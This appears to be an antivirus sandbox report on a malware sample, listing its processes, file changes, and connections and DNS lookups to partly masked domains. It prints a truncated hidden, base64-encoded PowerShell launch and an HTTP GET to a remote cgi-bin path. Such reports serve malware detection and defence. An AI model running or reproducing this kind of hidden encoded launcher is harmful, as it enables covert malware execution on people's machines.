Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHQAYwBpAHEAbABkAGwAeQBmAHQAPQAnAFoAZwB1AGQAdABmAHcAegBpAG8AbwAnADsAJABGAHAAdwBmAG8AZAB6AGwAYgB1ACAAPQAgACcAMwA0ADEAJwA7ACQAVgBuAGMAcQBsAG4AbgBmAHUAcQBwAGcAPQAnAEEAbAB6AHcAeQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
Modifies file system
Creates the following files
- %TEMP%\746027.cvr
- %HOMEPATH%\341.exe
Deletes the following files
- %HOMEPATH%\341.exe
Network activity
Connects to
- 'nb###obalhk.com':80
- 'pa###enacf.org':443
TCP
HTTP GET requests
- http://nb###obalhk.com/cgi-bin/32n2/
Other
- 'pa###enacf.org':443
UDP
- DNS ASK po####presents.info
- DNS ASK nb###obalhk.com
- DNS ASK ar###oup101.com
- DNS ASK pa###enacf.org
- DNS ASK ar####hemical.com
